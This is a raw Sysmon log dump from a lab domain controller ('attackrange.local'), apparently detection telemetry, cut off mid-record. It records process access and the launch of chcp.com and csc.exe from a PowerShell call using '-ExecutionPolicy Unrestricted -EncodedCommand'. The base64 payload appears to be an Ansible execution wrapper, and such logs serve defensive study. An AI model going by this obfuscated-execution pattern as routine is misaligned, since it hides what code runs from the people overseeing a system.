13:54:15.888{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003932Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.872{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003931Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.872{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8587-5FCF-C600-000000009101}4728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003930Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.872{10ACEC4A-8587-5FCF-C400-000000009101}44323320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8587-5FCF-C600-000000009101}4728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c1edb|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c19a9|UNKNOWN(00007FF81929B7BF) 154100x80000000000000003929Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.887{10ACEC4A-8587-5FCF-C600-000000009101}4728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\xeo0comy.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x80000000000000003928Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.872{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\xeo0comy.cmdline2020-12-08 13:54:15.872 11241100x80000000000000003927Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:15.872{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\xeo0comy.dll2020-12-08 13:54:15.872 10341000x80000000000000003926Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8587-5FCF-C100-000000009101}46044492C:\Windows\system32\conhost.exe{10ACEC4A-8587-5FCF-C500-000000009101}4180C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003925Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003924Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003923Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003922Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003921Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003920Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003919Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003918Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003917Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8587-5FCF-C500-000000009101}4180C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003916Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003915Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8587-5FCF-C400-000000009101}44323320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-8587-5FCF-C500-000000009101}4180C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c51efa5b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4690665|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4690336|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c5141c1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4650ecc|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c46af39b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4692a00|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4692a00|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4692891|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4684816|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4690d49|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c469093c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4690665|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4690336|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c5141c1b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4677197|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+c4676767 154100x80000000000000003914Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.435{10ACEC4A-8587-5FCF-C500-000000009101}4180C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8587-5FCF-624B-070000000000}0x74b620HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{10ACEC4A-8587-5FCF-C400-000000009101}4432C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000003913Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:15.420{10ACEC4A-853E-5FCF-0B00-000000009101}864988C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003912Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 